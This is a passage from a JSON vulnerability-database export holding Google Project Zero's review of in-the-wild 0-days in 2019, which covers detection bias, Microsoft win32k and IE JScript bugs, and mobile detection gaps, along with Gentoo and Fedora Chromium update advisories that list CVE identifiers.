drives.\n\nOn average, 23.62% of user computers globally faced at least one **Malware-class** local threat in Q1.", "modified": "2019-05-23T10:00:53", "published": "2019-05-23T10:00:53", "id": "SECURELIST:A3CEAF1114E104F14254F7AF77D7D080", "href": "https://securelist.com/it-threat-evolution-q1-2019-statistics/90916/", "type": "securelist", "title": "IT threat evolution Q1 2019. Statistics", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}], "googleprojectzero": [{"lastseen": "2020-12-14T19:22:35", "bulletinFamily": "info", "cvelist": ["CVE-2016-5195", "CVE-2018-8653", "CVE-2019-0676", "CVE-2019-0703", "CVE-2019-0797", "CVE-2019-0803", "CVE-2019-0808", "CVE-2019-0859", "CVE-2019-0880", "CVE-2019-1132", "CVE-2019-1367", "CVE-2019-13720", "CVE-2019-1429", "CVE-2019-1458", "CVE-2019-2215", "CVE-2019-5786", "CVE-2019-7286", "CVE-2019-7287", "CVE-2020-0674"], "description": "Posted by Maddie Stone, Project Zero\n\n** \n**\n\nIn May 2019, Project Zero released our [tracking spreadsheet](<https://docs.google.com/spreadsheets/d/1lkNJ0uQwbeC1ZTRrxdtuPLCIl7mlUreoKfSIgajnSyY/edit#gid=0>) for 0-days used \u201cin the wild\u201d and we started a more focused effort on analyzing and learning from these exploits. This is another way Project Zero is trying to make zero-day hard. This blog post synthesizes many of our efforts and what we\u2019ve seen over the last year. We provide a review of what we can learn from 0-day exploits detected as used in the wild in 2019. In conjunction with this blog post, we are also publishing another [blog post](<https://googleprojectzero.blogspot.com/2020/07/root-cause-analyses-for-0-day-in-wild.html>) today about our root cause analysis work that informed the conclusions in this Year in Review. We are also releasing [8 root cause analyses](<https://googleprojectzero.blogspot.com/p/rca.html>) that we have done for in-the-wild 0-days from 2019. \n\n** \n**\n\nWhen I had the idea for this \u201cYear in Review\u201d blog post, I immediately started brainstorming the different ways we could slice the data and the different conclusions it may show. I thought that maybe there\u2019d be interesting conclusions around why use-after-free is one of the most exploited bug classes or how a given exploitation method was used in Y% of 0-days or\u2026 but despite my attempts to find these interesting technical conclusions, over and over I kept coming back to the problem of the detection of 0-days. Through the variety of areas I explored, the data and analysis continued to highlight a single conclusion: As a community, our ability to detect 0-days being used in the wild is severely lacking to the point that we can\u2019t draw significant conclusions due to the lack of (and biases in) the data we have collected.\n\n** \n**\n\nThe rest of the blog post will detail the analyses I did on 0-days exploited in 2019 that informed this conclusion. As a team, Project Zero will continue to research new detection methods for 0-days. We hope this post will convince you to work with us on this effort.\n\n# The Basics\n\nIn 2019, 20 0-days were detected and disclosed as exploited in the wild. This number, and our tracking, is scoped to targets and areas that Project Zero actively researches. You can read more about our scoping [here](<https://docs.google.com/spreadsheets/d/1lkNJ0uQwbeC1ZTRrxdtuPLCIl7mlUreoKfSIgajnSyY/edit#gid=0>). This seems approximately average for years 2014-2017 with an uncharacteristically low number of 0-days detected in 2018. Please note that Project Zero only began tracking the data in July 2014 when the team was founded and so the numbers for 2014 have been doubled as an approximation. \n\n \n\n\n[](<https://1.bp.blogspot.com/-KjU24qokuEA/Xx7hJ08C_1I/AAAAAAAAQsM/OKDRS46ehfI1hNudHNV4_lNoUHxTubtfgCNcBGAsYHQ/s1600/image2.png>)\n\n \n\n\n** \n**\n\nThe largely steady number of detected 0-days might suggest that defender detection techniques are progressing at the same speed as attacker techniques. That could be true. Or it could not be. The data in our spreadsheet are only the 0-day exploits that were detected, not the 0-day exploits that were used. As long as we still don\u2019t know the true detection rate of all 0-day exploits, it\u2019s very difficult to make any conclusions about whether the number of 0-day exploits deployed in the wild are increasing or decreasing. For example, if all defenders stopped detection efforts, that could make it appear that there are no 0-days being exploited, but we\u2019d clearly know that to be false.\n\n** \n**\n\nAll of the 0-day exploits detected in 2019 are detailed in the Project Zero [tracking spreadsheet here](<https://docs.google.com/spreadsheets/d/1lkNJ0uQwbeC1ZTRrxdtuPLCIl7mlUreoKfSIgajnSyY/edit#gid=8521108>). \n\n** \n**\n\n## 0-days by Vendor\n\nOne of the common ways to analyze vulnerabilities and security issues is to look at who is affected. The breakdown of the 0-days exploited in 2019 by vendor is below. While the data shows us that almost all of the big platform vendors have at least a couple of 0-days detected against their products, there is a large disparity. Based on the data, it appears that Microsoft products are targeted about 5x more than Apple and Google products. Yet Apple and Google, with their iOS and Android products, make up a huge majority of devices in the world. \n\n** \n**\n\nWhile Microsoft Windows has always been a prime target for actors exploiting 0-days, I think it\u2019s more likely that we see more Microsoft 0-days due to detection bias. Because Microsoft has been a target before some of the other platforms were even invented, there have been many more years of development into 0-day detection solutions for Microsoft products. Microsoft\u2019s ecosystem also allows for 3rd parties, in addition to Microsoft themself, to deploy detection solutions for 0-days. The more people looking for 0-days using varied detection methodologies suggests more 0-days will be found.\n\n** \n**\n\n[](<https://1.bp.blogspot.com/-GZX-X9f4DIA/Xx7hqTX713I/AAAAAAAAQsY/rFiPVHd9cloMQtfR4bPTL9SGRyCNV2N5gCNcBGAsYHQ/s1600/image1.png>)\n\n \n\n\n** \n**\n\n# Microsoft Deep-Dive\n\nFor 2019, there were 11 0-day exploits detected in-the-wild in Microsoft products, more than 50% of all 0-days detected. Therefore, I think it\u2019s worthwhile to dive into the Microsoft bugs to see what we can learn since it\u2019s the only platform we have a decent sample size for. \n\n** \n**\n\nOf the 11 Microsoft 0-days, only 4 were detected as exploiting the latest software release of Windows . All others targeted earlier releases of Windows, such as Windows 7, which was originally released in 2009. Of the 4 0-days that exploited the latest versions of Windows, 3 targeted Internet Explorer, which, while it\u2019s not the default browser for Windows 10, is still included in the operating system for backwards compatibility. This means that 10/11 of the Microsoft vulnerabilities targeted legacy software. \n\n** \n**\n\nOut of the 11 Microsoft 0-days, 6 targeted the Win32k component of the Windows operating system. Win32k is the kernel component responsible for the windows subsystem, and historically it has been a prime target for exploitation. However, with Windows 10, Microsoft dedicated resources to locking down the attack surface of win32k. Based on the data of detected 0-days, none of the 6 detected win32k exploits were detected as exploiting the latest Windows 10 software release. And 2 of the 0-days (CVE-2019-0676 and CVE-2019-1132) only affected Windows 7.\n\n** \n**\n\nEven just within the Microsoft 0-days, there is likely detection bias. Is legacy software really the predominant targets for 0-days in Microsoft Windows, or are we just better at detecting them since this software and these exploit techniques have been around the longest?\n\n** \n**\n\nCVE\n\n| \n\nWindows 7 SP1\n\n| \n\nWindows 8.1\n\n| \n\nWindows 10\n\n| \n\nWin 10 1607\n\n| \n\nWIn 10 1703\n\n| \n\nWIn 10 1803\n\n| \n\nWin 10 1809\n\n| \n\nWin 10 1903\n\n| \n\nExploitation of Latest SW Release?\n\n| \n\nComponent \n \n---|---|---|---|---|---|---|---|---|---|--- \n \nCVE-2019-0676\n\n| \n\nX\n\n| \n\nX\n\n| \n\nX\n\n| \n\nX\n\n| \n\nX\n\n| \n\nX\n\n| \n\nX\n\n| \n| \n\nYes (1809)\n\n| \n\nIE \n \nCVE-2019-0808\n\n| \n\nX\n\n| \n| \n| \n| \n| \n| \n| \n| \n\nN/A (1809)\n\n| \n\nwin32k \n \nCVE-2019-0797\n\n| \n| \n\nX\n\n| \n\nX\n\n| \n\nX\n\n| \n\nX\n\n| \n\nX\n\n| \n\nX\n\n| \n| \n\nExploitation Unlikely (1809)\n\n| \n\nwin32k \n \nCVE-2019-0703\n\n| \n\nX\n\n| \n\nX\n\n| \n\nX\n\n| \n\nX\n\n| \n\nX\n\n| \n\nX\n\n| \n\nX\n\n| \n| \n\nYes (1809)\n\n| \n\nWindows SMB \n \nCVE-2019-0803\n\n| \n\nX\n\n| \n\nX\n\n| \n\nX\n\n| \n\nX\n\n| \n\nX\n\n| \n\nX\n\n| \n\nX\n\n| \n| \n\nExp More Likely (1809)\n\n| \n\nwin32k \n \nCVE-2019-0859\n\n| \n\nX\n\n| \n\nX\n\n| \n\nX\n\n| \n\nX\n\n| \n\nX\n\n| \n\nX\n\n| \n\nX\n\n| \n| \n\nExp More Likely (1809)\n\n| \n\nwin32k \n \nCVE-2019-0880\n\n| \n\nX\n\n| \n\nX\n\n| \n\nX\n\n| \n\nX\n\n| \n\nX\n\n| \n\nX\n\n| \n\nX\n\n| \n\nX\n\n| \n\nExp More Likely (1903)\n\n| \n\nsplwow64 \n \nCVE-2019-1132\n\n| \n\nX\n\n| \n| \n| \n| \n| \n| \n| \n| \n\nN/A (1903)\n\n| \n\nwin32k \n \nCVE-2019-1367\n\n| \n\nX\n\n| \n\nX\n\n| \n\nX\n\n| \n\nX\n\n| \n\nX\n\n| \n\nX\n\n| \n\nX\n\n| \n\nX\n\n| \n\nYes (1903)\n\n| \n\nIE \n \nCVE-2019-1429\n\n| \n\nX\n\n| \n| \n\nX\n\n| \n\nX\n\n| \n\nX\n\n| \n\nX\n\n| \n\nX\n\n| \n\nX\n\n| \n\nYes (1903)\n\n| \n\nIE \n \nCVE-2019-1458\n\n| \n\nX\n\n| \n\nX\n\n| \n\nX\n\n| \n\nX\n\n| \n| \n| \n| \n| \n\nN/A (1909)\n\n| \n\nwin32k \n \n** \n**\n\n## Internet Explorer JScript 0-days CVE-2019-1367 and CVE-2019-1429\n\nWhile this blog post\u2019s goal is not to detail each 0-day used in 2019, it\u2019d be remiss not to discuss the Internet Explorer JScript 0-days. CVE-2019-1367 and CVE-2019-1429 (and CVE-2018-8653 from Dec 2018 and CVE-2020-0674 from Feb 2020) are all variants of each other with all 4 being exploited in the wild by the same actor [according to Google\u2019s Threat Analysis Group (TAG)](<https://www.blog.google/threat-analysis-group/identifying-vulnerabilities-and-protecting-you-phishing/>). \n\n** \n**\n\nOur [root cause analysis](<https://googleprojectzero.blogspot.com/p/rca-cve-2019-1367.html>) provides more details on these bugs, but we\u2019ll summarize the points here. The bug class is a JScript variable not being tracked by the garbage collector. Multiple instances of this bug class were discovered in Jan 2018 by Ivan Fratric of Project Zero. In December 2018, Google's TAG discovered this bug class being used in the wild (CVE-2018-8653). Then in September 2019, another exploit using this bug class was found. This issue was \u201cfixed\u201d as CVE-2019-1367, but it turns out the patch didn\u2019t actually fix the issue and the attackers were able to continue exploiting the original bug. At the same time, a variant was also found of the original bug by Ivan Fratric ([P0 1947](<https://bugs.chromium.org/p/project-zero/issues/detail?id=1947>)). Both the variant and the original bug were fixed as CVE-2019-1429. Then in January 2020, TAG found another exploit sample, because Microsoft\u2019s patch was again incomplete. This issue was patched as CVE-2020-0674. \n\n** \n**\n\nA more thorough discussion on variant analysis and complete patches is due, but at this time we\u2019ll simply note: The attackers who used the 0-day exploit had 4 separate chances to continue attacking users after the bug class and then particular bugs were known. If we as an industry want to make 0-day harder, we can\u2019t give attackers four chances at the same bug. \n\n# Memory Corruption\n\n63% of 2019\u2019s exploited 0-day vulnerabilities fall under memory corruption, with half of those memory corruption bugs being use-after-free vulnerabilities. Memory corruption and use-after-free\u2019s being a common target is nothing new. \u201c[Smashing the Stack for Fun and Profit](<http://phrack.org/issues/49/14.html>)\u201d, the seminal work describing stack-based memory corruption, was published back in 1996. But it\u2019s interesting to note that almost two-thirds of all detected 0-days are still exploiting memory corruption bugs when there\u2019s been so much interesting security research into other classes of vulnerabilities, such as logic bugs and compiler bugs. Again, two-thirds of detected 0-days are memory corruption bugs. While I don\u2019t know for certain that that proportion is false, we can't know either way because it's easier to detect memory corruption than other types of vulnerabilities. Due to the prevalence of memory corruption bugs and that they tend to be less reliable then logic bugs, this could be another detection bias. Types of memory corruption bugs tend to be very similar within platforms and don\u2019t really change over time: a use-after-free from a decade ago largely looks like a use-after-free bug today and so I think we may just be better at detecting these exploits. Logic and design bugs on the other hand rarely look the same because in their nature they\u2019re taking advantage of a specific flaw in the design of that specific component, thus making it more difficult to detect than standard memory corruption vulns.\n\n** \n**\n\nEven if our data is biased to over-represent memory corruption vulnerabilities, memory corruption vulnerabilities are still being regularly exploited against users and thus we need to continue focusing on systemic and structural fixes such as memory tagging and memory safe languages.\n\n# More Thoughts on Detection\n\nAs we\u2019ve discussed up to this point, the same questions posed in the team's [original blog post](<https://googleprojectzero.blogspot.com/p/0day.html>) still hold true: \u201cWhat is the detection rate of 0-day exploits?\u201d and \u201cHow many 0-day exploits are used without being detected?\u201d. \n\n** \n**\n\nWe, as the security industry, are only able to review and analyze 0-days that were detected, not all 0-days that were used. While some might see this data and say that Microsoft Windows is exploited with 0-days 11x more often than Android, those claims cannot be made in good faith. Instead, I think the security community simply detects 0-days in Microsoft Windows at a much higher rate than any other platform. If we look back historically, the first anti-viruses and detections were built for Microsoft Windows rather than any other platform. As time has continued, the detection methods for Windows have continued to evolve. Microsoft builds tools and techniques for detecting 0-days as well as third party security companies. We don\u2019t see the same plethora of detection tools on other platforms, especially the mobile platforms, which means there\u2019s less likelihood of detecting 0-days on those platforms too. An area for big growth is detecting 0-days on platforms other than Microsoft Windows and what level of access a vendor provides for detection..\n\n** \n**\n\n## Who is doing the detecting? \n\nAnother interesting side of detection is that a single security researcher, Cl\u00e9ment Lecigne of the Google's TAG is credited with 7 of the 21 detected 0-days in 2019 across 4 platforms: Apple iOS (CVE-2019-7286, CVE-2019-7287), Google Chrome (CVE-2019-5786), Microsoft Internet Explorer (CVE-2019-0676, CVE-2019-1367, CVE-2019-1429), and Microsoft Windows (CVE-2019-0808). Put another way, we could have detected a third less of the 0-days actually used in the wild if it wasn\u2019t for Cl\u00e9ment and team. When we add in the entity with the second most, Kaspersky Lab, with 4 of the 0-days (CVE-2019-0797, CVE-2019-0859, CVE-2019-13720, CVE-2019-1458), that means that two entities are responsible for more than 50% of the 0-days detected in 2019. If two entities out of the entirety of the global security community are responsible for detecting more than half of the 0-days in a year, that\u2019s a worrying sign for how we\u2019re using our resources. . The security community has a lot of growth to do in this area to have any confidence that we are detecting the majority of 0-days exploits that are used in the wild. \n\n** \n**\n\nOut of the 20 0-days, only one (CVE-2019-0703) included discovery credit to the vendor that was targeted, and even that one was also credited to an external researcher. To me, this is surprising because I\u2019d expect that the vendor of a platform would be best positioned to detect 0-days with their access to the most telemetry data, logs, ability to build detections into the platform, \u201ctips\u201d about exploits, etc. This begs the question: are the vendor security teams that have the most access not putting resources towards detecting 0-days, or are they finding them and just not disclosing them when they are found internally? Either way, this is less than ideal. When you consider the locked down mobile platforms, this is especially worrisome since it\u2019s so difficult for external researchers to get into those platforms and detect exploitation.\n\n** \n**\n\n## \u201cClandestine\u201d 0-day reporting\n\nAnecdotally, we know that sometimes vulnerabilities are reported surreptitiously, meaning that they are reported as just another bug, rather than a vulnerability that is being actively exploited. This hurts security because users and their enterprises may take different actions, based on their own unique threat models, if they knew a vulnerability was actively exploited. Vendors and third party security professionals could also create better detections, invest in related research, prioritize variant analysis, or take other actions that could directly make it more costly for the attacker to exploit additional vulnerabilities and users if they knew that attackers were already exploiting the bug. If all would transparently disclose when a vulnerability is exploited, our detection numbers would likely go up as well, and we would have better information about the current preferences and behaviors of attackers.\n\n** \n**\n\n# 0-day Detection on Mobile Platforms\n\nAs mentioned above, an especially interesting and needed area for development is mobile platforms, iOS and Android. In 2019, there were only 3 detected 0-days for all of mobile: 2 for iOS (CVE-2019-7286 and CVE-2019-7287) and 1 for Android (CVE-2019-2215). However, there are billions of mobile phone users and Android and iOS exploits sell for double or more compared to an equivalent desktop exploit according to [Zerodium](<https://zerodium.com/program.html>). We know that these exploits are being developed and used, we\u2019re just not finding them. The mobile platforms, iOS and Android, are likely two of the toughest platforms for third party security solutions to deploy upon due to the \u201cwalled garden\u201d of iOS and the application sandboxes of both platforms. The same features that are critical for user security also make it difficult for third parties to deploy on-device detection solutions. Since it\u2019s so difficult for non-vendors to deploy solutions, we as users and the security community, rely on the vendors to be active and transparent in hunting 0-days targeting these platforms. Therefore a crucial question becomes, how do we as fellow security professionals incentivize the vendors to prioritize this?\n\n** \n**\n\nAnother interesting artifact that appeared when doing the analysis is that CVE-2019-2215 is the first detected 0-day since we started tracking 0-days targeting Android. Up until that point, the closest was CVE-2016-5195, which targeted Linux. Yet, the only Android 0-day found in 2019 (AND since 2014) is CVE-2019-2215, which was detected through documents rather than by finding a zero-day exploit sample. Therefore, no 0-day exploit samples were detected (or, at least, publicly disclosed) in all of 2019, 2018, 2017, 2016, 2015, and half of 2014. Based on knowledge of the offensive security industry, we know that that doesn\u2019t mean none were used. Instead it means we aren\u2019t detecting well enough and 0-days are being exploited without public knowledge. Therefore, those 0-days go unpatched and users and the security community are unable to take additional defensive actions. Researching new methodologies for detecting 0-days targeting mobile platforms, iOS and Android, is a focus for Project Zero in 2020.\n\n** \n**\n\n# Detection on Other Platforms\n\nIt\u2019s interesting to note that other popular platforms had no 0-days detected over the same period: like Linux, Safari, or macOS. While no 0-days have been publicly detected in these operating systems, we can have confidence that they are still targets of interest, based on the amount of users they have, job requisitions for offensive positions seeking these skills, and even conversations with offensive security researchers. If Trend Micro\u2019s OfficeScan is worth targeting, then so are the other much more prevalent products. If that\u2019s the case, then again it leads us back to detection. We should also keep in mind though that some platforms may not need 0-days for successful exploitation. For example, this [blogpost](<https://googleprojectzero.blogspot.com/2019/08/jsc-exploits.html>) details how iOS exploit chains used publicly known n-days to exploit WebKit. But without more complete data, we can\u2019t make confident determinations of how much 0-day exploitation is occurring per platform.\n\n# Conclusion\n\nHere\u2019s our first Year in Review of 0-days exploited in the wild. As this program evolves, so will what we publish based on feedback from you and as our own knowledge and experience continues to grow. We started this effort with the assumption of finding a multitude of different conclusions, primarily \u201ctechnical\u201d, but once the analysis began, it became clear that everything came back to a single conclusion: we have a big gap in detecting 0-day exploits. Project Zero is committed to continuing to research new detection methodologies for 0-day exploits and sharing that knowledge with the world. \n\n** \n**\n\nAlong with publishing this Year in Review today, we\u2019re also publishing the [root cause analyses](<https://googleprojectzero.blogspot.com/p/rca.html>) that we completed, which were used to draw our conclusions. Please check out the [blog post](<https://googleprojectzero.blogspot.com/2020/07/root-cause-analyses-for-0-day-in-wild.html>) if you\u2019re interested in more details about the different 0-days exploited in the wild in 2019. \n\n \n\n", "modified": "2020-07-29T00:00:00", "published": "2020-07-29T00:00:00", "id": "GOOGLEPROJECTZERO:2E85097DC4FBE492B1CB6FAE84AFE126", "href": "https://googleprojectzero.blogspot.com/2020/07/detection-deficit-year-in-review-of-0.html", "type": "googleprojectzero", "title": "\nDetection Deficit: A Year in Review of 0-days Used In-The-Wild in 2019\n", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}], "gentoo": [{"lastseen": "2019-03-28T06:33:59", "bulletinFamily": "unix", "cvelist": ["CVE-2019-5802", "CVE-2019-5789", "CVE-2019-5803", "CVE-2019-5792", "CVE-2019-5801", "CVE-2019-5793", "CVE-2019-5804", "CVE-2019-5797", "CVE-2019-5798", "CVE-2019-5795", "CVE-2019-5786", "CVE-2019-5799", "CVE-2019-5796", "CVE-2019-5791", "CVE-2019-5790", "CVE-2019-5794", "CVE-2019-5800", "CVE-2018-17479", "CVE-2019-5788", "CVE-2019-5787"], "description": "### Background\n\nChromium is an open-source browser project that aims to build a safer, faster, and more stable way for all users to experience the web. \n\n### Description\n\nMultiple vulnerabilities have been discovered in Chromium and Google Chrome. Please review the referenced CVE identifiers and Google Chrome Releases for details. \n\n### Impact\n\nPlease review the referenced CVE identifiers and Google Chrome Releases for details. \n\n### Workaround\n\nThere is no known workaround at this time.\n\n### Resolution\n\nAll Chromium users should upgrade to the latest version:\n \n \n # emerge --sync\n # emerge --ask --oneshot --verbose\n \">=www-client/chromium-73.0.3683.75\"", "edition": 1, "modified": "2019-03-28T00:00:00", "published": "2019-03-28T00:00:00", "id": "GLSA-201903-23", "href": "https://security.gentoo.org/glsa/201903-23", "title": "Chromium: Multiple vulnerabilities", "type": "gentoo", "cvss": {"score": 0.0, "vector": "NONE"}}], "fedora": [{"lastseen": "2020-12-21T08:17:55", "bulletinFamily": "unix", "cvelist": ["CVE-2019-5754", "CVE-2019-5755", "CVE-2019-5756", "CVE-2019-5757", "CVE-2019-5758", "CVE-2019-5759", "CVE-2019-5760", "CVE-2019-5761", "CVE-2019-5762", "CVE-2019-5763", "CVE-2019-5764", "CVE-2019-5765", "CVE-2019-5766", "CVE-2019-5767", "CVE-2019-5768", "CVE-2019-5769", "CVE-2019-5770", "CVE-2019-5771", "CVE-2019-5772", "CVE-2019-5773", "CVE-2019-5774", "CVE-2019-5775", "CVE-2019-5776", "CVE-2019-5777", "CVE-2019-5778", "CVE-2019-5779", "CVE-2019-5780", "CVE-2019-5781", "CVE-2019-5782", "CVE-2019-5784", "CVE-2019-5786", "CVE-2019-5787", "CVE-2019-5788", "CVE-2019-5789", "CVE-2019-5790", "CVE-2019-5791", "CVE-2019-5792", "CVE-2019-5793", "CVE-2019-5794", "CVE-2019-5795", "CVE-2019-5796", "CVE-2019-5797", "CVE-2019-5798", "CVE-2019-5799", "CVE-2019-5800", "CVE-2019-5801", "CVE-2019-5802", "CVE-2019-5803", "CVE-2019-5804"], "description": "Chromium is an open-source web browser, powered by WebKit (Blink). ", "modified": "2019-03-29T19:41:48", "published": "2019-03-29T19:41:48", "id": "FEDORA:3240460C5991", "href": "", "type": "fedora", "title": "[SECURITY] Fedora 30 Update: chromium-73.0.3683.75-2.fc30", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-12-21T08:17:55", "bulletinFamily": "unix", "cvelist": ["CVE-2019-5754", "CVE-2019-5755", "CVE-2019-5756", "CVE-2019-5757", "CVE-2019-5758", "CVE-2019-5759", "CVE-2019-5760", "CVE-2019-5761", "CVE-2019-5762", "CVE-2019-5763", "CVE-2019-5764", "CVE-2019-5765", "CVE-2019-5766", "CVE-2019-5767", "CVE-2019-5768", "CVE-2019-5769", "CVE-2019-5770", "CVE-2019-5771", "CVE-2019-5772", "CVE-2019-5773", "CVE-2019-5774", "CVE-2019-5775", "CVE-2019-5776", "CVE-2019-5777", "CVE-2019-5778", "CVE-2019-5779", "CVE-2019-5780", "CVE-2019-5781", "CVE-2019-5782", "CVE-2019-5784", "CVE-2019-5786", "CVE-2019-5787", "CVE-2019-5788", "CVE-2019-5789", "CVE-2019-5790", "CVE-2019-5791", "CVE-2019-5792", "CVE-2019-5793", "CVE-2019-5794", "CVE-2019-5795", "CVE-2019-5796", "CVE-2019-5797", "CVE-2019-5798", "CVE-2019-5799", "CVE-2019-5800", "CVE-2019-5801", "CVE-2019-5802", "CVE-2019-5803", "CVE-2019-5804"], "description": "Chromium is an open-source web browser, powered by WebKit (Blink). ", "modified": "2019-03-25T06:10:55", "published": "2019-03-25T06:10:55", "id": "FEDORA:906EB6076D01", "href": "", "type": "fedora", "title": "[SECURITY] Fedora 29 Update: chromium-73.0.3683.75-2.fc29", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}]}
